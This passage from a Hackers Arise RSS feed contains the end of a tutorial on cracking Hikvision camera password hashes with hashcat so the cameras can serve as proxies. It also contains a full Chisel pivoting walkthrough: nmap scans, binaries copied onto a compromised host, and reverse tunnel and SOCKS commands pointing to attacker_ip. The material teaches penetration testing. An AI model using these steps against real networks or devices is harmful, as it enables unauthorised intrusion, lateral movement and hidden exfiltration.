<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="498" src="https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-1024x498.webp" alt="" class="wp-image-15757" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-1024x498.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-300x146.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution-768x373.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/06/17-camera-remote-code-execution.webp 1171w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

The exploit doesn’t allow for complex commands, so you need to be efficient. You won’t be able to split the payload like we will be doing in Part 2. Instead, you want to quickly locate the file that holds the hashes.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="524" height="112" src="https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file.webp" alt="" class="wp-image-15758" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file.webp 524w, https://hackers-arise.com/wp-content/uploads/2025/06/18-passwd-file-300x64.webp 300w" sizes="(max-width: 524px) 100vw, 524px" /></figure>

Once you have the hash copied, move to cracking it. Hikvision has a built-in requirement for all passwords to be at least 8 characters long. So, before starting hashcat, filter your wordlist:
awk ‘length($0) >= 8’ rockyou.txt > wordlist.txt
This will save time and skip unnecessary short entries. Cracking the hash is resource-intensive and may take a while depending on your hardware and the complexity of the password. Run hashcat using mode 500 (MD5 crypt) as shown below:
hashcat -m 500 hash.txt wordlist.txt

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="639" height="153" src="https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat.webp" alt="" class="wp-image-15759" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat.webp 639w, https://hackers-arise.com/wp-content/uploads/2025/06/19-running-hashcat-300x72.webp 300w" sizes="(max-width: 639px) 100vw, 639px" /></figure>

Let it run and monitor for successful recovery. With persistence and enough dictionary strength, you’ll eventually crack the password. Once done, use it to log in via the web interface or SSH , if you later enable it. This method is slower than others but effective when shell payloads fail. Keep it in your toolkit when other vectors are closed.
<h2 class="wp-block-heading"><a></a>Conclusion</h2>
As shown, some cameras are easy to turn into a stepping stone. All you need is a working password, an unpatched vulnerability or a good wordlist. Since cameras are rarely segmented from the main network, once you’re in, you have potential access to everything. They make excellent proxies for network reconnaissance or further attacks.
In the following parts, we’ll cover firmware reverse engineering and modification. Things will get more advanced. Stay tuned.
The post <a href="https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/">Network Espionage: Using Russian Cameras as Proxies to Hide Your Data</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Pivoting within the Network: Getting Started with Chisel</title>
<link>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/</link>
<comments>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Thu, 19 Jun 2025 16:49:11 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Pentesting]]></category>
<category><![CDATA[Scanner]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15627</guid>
<description><![CDATA[Welcome back, aspiring cyberwarriors! When performing a penetration test or cyberwar mission, you’re typically not targeting just one computer. Often, you’re targeting multiple systems and need to move across the network, pivoting to gain further access to the environment. However, pivoting can sometimes be challenging. In this article, I’d like to introduce you to a […]
The post <a href="https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/">Pivoting within the Network: Getting Started with Chisel</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors!
When performing a penetration test or cyberwar mission, you’re typically not targeting just one computer. Often, you’re targeting multiple systems and need to move across the network, pivoting to gain further access to the environment. However, pivoting can sometimes be challenging. In this article, I’d like to introduce you to a tool that simplifies this process: Chisel.
In the initial stage of the attack, we can observe the following network:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="352" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network.avif" alt="" class="wp-image-15628" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_network-300x143.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Let’s perform a ping scan across the subnet 10.10.10.0/24 to identify live hosts:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="203" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts.avif" alt="" class="wp-image-15629" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hosts-300x82.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Below is a breakdown of the command and its output:
<h2 class="wp-block-heading" id="ydj8444640">Command Explanation:</h2>
<ul id="06nzx44642" class="wp-block-list">
<li>nmap -sP 10.10.10.0/24 -n -T5
<ul class="wp-block-list">
<li>-sP: This option tells Nmap to perform a ping scan, which checks if hosts are up without probing ports.</li>
<li>10.10.10.0/24: Specifies the target subnet to scan, covering all IPs from 10.10.10.0 to 10.10.10.255.</li>
<li>-n: Disables DNS resolution, speeding up the scan by skipping hostname lookups.</li>
<li>-T5: Sets the timing template to 5 (the highest), making the scan as fast as possible. Be cautious, as this can be noisy and might trigger IDS/IPS alerts.</li>
</ul>
</li>
</ul>
<h2 class="wp-block-heading" id="2ydix44663">Output Interpretation:</h2>
<ul id="ftd6c44665" class="wp-block-list">
<li>Nmap has detected two hosts as “up” in this subnet: 10.10.10.1 and 10.10.10.2.</li>
<li>The reported latency times (0.00025s and 0.00026s) are extremely low, indicating a very fast response from these hosts.</li>
<li>The scan completed in 2.13 seconds, checking all 256 IP addresses in the subnet.</li>
</ul>
This type of scan is useful in pivoting scenarios for quickly identifying reachable hosts within a target subnet.
We can see that 10.10.10.2 is our target machine. Next, I’m going to log in via SSH and use our previously earned root privileges. For this demonstration, I will skip the exploitation phase and focus solely on the pivoting process.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="241" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login.avif" alt="" class="wp-image-15630" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_login-300x98.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
Now that I have access, I will bring in the necessary tools.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="366" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools.avif" alt="" class="wp-image-15631" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_take_the_tools-300x148.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
As you can see, I have set up a Python server and copied the tools I need onto the ‘hacked’ machine. The tools we need are Nmap, Socat, and Chisel. It’s important to note that these are static binaries, so I can run them on the target machine without any dependencies.
Now, if we run hostname -I:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="350" height="137" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname.avif" alt="" class="wp-image-15632" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname.avif 350w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_hostname-300x117.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" /></figure>
We see two interfaces: the one we already know (our target) and a new one. What we want to do here is scan the entire range to see what we can find. First, let’s move our tools into a new directory called tools, then give the necessary permissions to make them executable.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="662" height="487" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools.avif" alt="" class="wp-image-15633" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools.avif 662w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_prepare_tools-300x221.jpg 300w" sizes="(max-width: 662px) 100vw, 662px" /></figure>
Now, I can use Nmap to scan the network.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="347" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network.avif" alt="" class="wp-image-15634" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_scan_network-300x141.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
We’ve found a new target. However, if we try to reach that target from our Kali machine, it won’t be possible. We’ll need our set of tools to proceed.
First, we need to set up our Chisel server to do some tunneling, port forwarding and even configure a SOCKS proxy. This will allow us to gain better access to the internal network, all the way from our Kali attacker machine.
Chisel is a fast, cross-platform tool designed for creating secure TCP/UDP tunnels through HTTP, making it useful for pivoting and bypassing network restrictions during red teaming or penetration testing.
<h2 class="wp-block-heading" id="q7rtt46327">Underground Recognition of Chisel</h2>
While detailed attribution can be challenging, threat intelligence indicates that sophisticated threat groups have integrated Chisel into their operational toolkits. Advanced Persistent Threat (APT) groups, especially those operating in geopolitically sensitive regions, have been observed leveraging Chisel’s capabilities.
Groups like APT29 (Cozy Bear), known for their sophisticated cyber espionage campaigns, have shown interest in tools. Similarly, financially motivated threat actors targeting critical infrastructure have recognized Chisel’s potential.
<h2 class="wp-block-heading" id="woeqh46333">Technical Mechanics of Network Infiltration</h2>
The true power of Chisel lies in its versatile tunneling capabilities. Unlike traditional tools that rely on predictable communication patterns, Chisel adds sophistication through its HTTP/SSH hybrid approach.
Consider a scenario, which I described previously, where a penetration tester has compromised an internal workstation. Traditional methods would require direct network access or complex VPN configurations. Chisel transforms this constraint into an opportunity. To establish a reverse tunnel, we need just two commands:
chisel server –reverse -p 9090
chisel client attacker_ip:9090 R:3389:target_internal_ip:3389
These commands creates an encrypted pathway.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="289" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway.avif" alt="" class="wp-image-15635" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_pathway-300x117.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="ci0zo47511">Explanation of the Command</h2>
<ul id="ltl0n47559" class="wp-block-list">
<li>./chisel: Executes the Chisel binary from the current directory.</li>
<li>server: Configures Chisel to operate in server mode.</li>
<li>-p 9090: Specifies that Chisel will listen on port 9090.</li>
<li>–reverse: Enables reverse tunneling, allowing a Chisel client (running on the target machine) to initiate connections back to the server.</li>
</ul>
<h2 class="wp-block-heading" id="6zdqs47572">Purpose of This Setup</h2>
This configuration sets up Chisel to accept reverse connections on port 9090. When a Chisel client connects to this server from a target machine inside a restricted network, it establishes a tunnel. This tunnel lets you access internal resources within the target network via the Chisel connection, effectively bypassing firewalls or other restrictions.
Using Chisel in this manner is a common practice in pivoting scenarios, where navigating internal networks requires establishing accessible pathways back to your machine.
<h2 class="wp-block-heading" id="agamq47578">Next Step</h2>
Now, you need to set up the Chisel client on the target machine to establish the connection.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="317" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection.avif" alt="" class="wp-image-15636" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_connection-300x129.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="ti33s48715">Breakdown of the Command:</h2>
<ul id="jwusw48831" class="wp-block-list">
<li>./chisel client:
<ul class="wp-block-list">
<li>This command starts Chisel in client mode, indicating that this instance of Chisel will establish a connection to a remote Chisel server.</li>
</ul>
</li>
<li>10.0.2.15:9090:
<ul class="wp-block-list">
<li>Specifies the IP address and port of the target Chisel server.</li>
<li>In this case, the client is connecting to a server running at IP address 10.0.2.15 and listening on port 9090.</li>
</ul>
</li>
<li>R:socks:</li>
<li>This option sets up a reverse SOCKS proxy. The R flag signals that the client will request the server to create a reverse SOCKS5 proxy.</li>
<li>This configuration establishes a SOCKS proxy on the server side, enabling the Chisel client to route traffic through the server. As a result, all traffic from the server can be directed through the newly created SOCKS proxy on the client.</li>
</ul>
<h2 class="wp-block-heading" id="5d6ji48861">Output Interpretation:</h2>
When the client attempts to connect to ws://10.0.2.15:9090, it is initiating a connection to the Chisel server running at IP address 10.0.2.15 on port 9090 over a WebSocket (ws://). The output also shows a fingerprint that matches the server’s certificate or identifier, confirming that the client has verified and recognized the server during the connection handshake. Once the connection is established, the latency is reported as 293.212µs, indicating a very low-latency connection and confirming that the SOCKS proxy is now active and ready for use.
By setting up this reverse SOCKS proxy, all traffic from the server can be routed to internal resources accessible to the client. This setup facilitates tasks such as reconnaissance, exploitation, or data exfiltration within the network.
<h2 class="wp-block-heading" id="xrvn548867">SOCKS5 Proxy:</h2>
SOCKS5 is a network proxy protocol that operates at the transport layer (Layer 4) and supports both TCP and UDP traffic. It routes packets between a client and a server via a proxy, acting as an intermediary that forwards the traffic to its destination. Applications configured to use a SOCKS5 proxy send all traffic through this intermediary, which then forwards the data to the target. SOCKS5 is commonly used to bypass network restrictions, mask the client’s IP address, and securely access internal networks. It also supports authentication, making it more secure than previous proxy protocols.
<h2 class="wp-block-heading" id="3edeo48871">SOCKS Proxy in This Scenario:</h2>
In this case, the reverse SOCKS proxy (R:socks) is established on the Chisel server. This means any traffic from the client can be routed through the compromised network to access internal systems that were previously unreachable. Tools such as web browsers or proxy-aware applications can be configured to use this SOCKS proxy for secure access to these internal resources.
<h2 class="wp-block-heading" id="kgjgb48875">WebSocket:</h2>
WebSocket is a communication protocol that allows for full-duplex communication channels over a single TCP connection. It enables both the client and server to send and receive messages simultaneously. After a WebSocket connection is established (beginning with an HTTP request and then upgrading to WebSocket), data can flow freely between the two parties.
<h2 class="wp-block-heading" id="2yi0p48879">WebSocket in This Scenario:</h2>
In this scenario, Chisel utilizes WebSocket connections (ws://) to establish communication between the client and server. This is beneficial in environments where HTTP traffic is allowed but other protocols or direct connections might be blocked by firewalls. The use of WebSockets ensures a reliable, real-time connection for forwarding and tunneling network traffic.
<h2 class="wp-block-heading" id="1pyt848883">Objective in This Scenario:</h2>
The primary objective here is to pivot from a compromised machine (the Chisel client) to explore and access resources within an internal network. By setting up a reverse SOCKS proxy over a WebSocket connection, several goals can be achieved: First, WebSocket traffic, which resembles normal HTTP traffic, can bypass restrictive firewalls and detection mechanisms. Second, network pivoting becomes possible, allowing tools such as Nmap, web browsers, or reconnaissance utilities to route traffic through the SOCKS proxy, effectively enabling exploration of internal systems as if the client were directly within the target network.
To forward the connection to the new target from the Kali or attacker’s machine, we need to configure the proxychains.conf file.
Here’s what the configuration should look like:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="415" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf.avif" alt="" class="wp-image-15637" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf-300x168.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
By doing this, you are configuring ProxyChains to forward traffic through the SOCKS proxy that Chisel has established, which is listening on port 1080.
<h2 class="wp-block-heading" id="jygcq52359">Reason for Adding the Chisel Server to ProxyChains: SOCKS Proxy Configuration</h2>
Chisel creates a SOCKS5 proxy, which allows traffic to be routed through the compromised machine or network where Chisel is running. This configuration ensures that all traffic passing through ProxyChains is forwarded via the Chisel SOCKS5 proxy.
<h2 class="wp-block-heading" id="uziie52363">Purpose: Pivoting and Lateral Movement</h2>
With this setup, you can pivot into the internal network through the compromised host. Any tool or application configured to use ProxyChains will have its traffic routed through the Chisel SOCKS5 proxy, enabling access to internal resources that were previously unreachable.
<h2 class="wp-block-heading" id="k7c5q52367">How It Works:</h2>
ProxyChains intercepts the traffic from applications (such as web browsers, Nmap, SQLmap, etc.) and forwards it to the specified proxy—in this case, the Chisel SOCKS5 proxy. This setup allows tools that are not inherently SOCKS-aware to communicate through the proxy, making them capable of routing traffic through the compromised network.
As we can see next, we have successfully reached our target:
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="386" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target.avif" alt="" class="wp-image-15638" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target-300x156.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="2w4t454459">Summary:</h2>
In this article, we explore the challenges of pivoting during penetration tests or cyberwarfare operations, where gaining access to multiple systems within a network is critical. We introduce Chisel, a powerful tool that streamlines the pivoting process, enabling security professionals to efficiently navigate networks and extend their access to target environments.The post <a href="https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/">Pivoting within the Network: Getting Started with Chisel</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
</channel>
</rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):

<a href="http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml

Home · About · News · Docs · Terms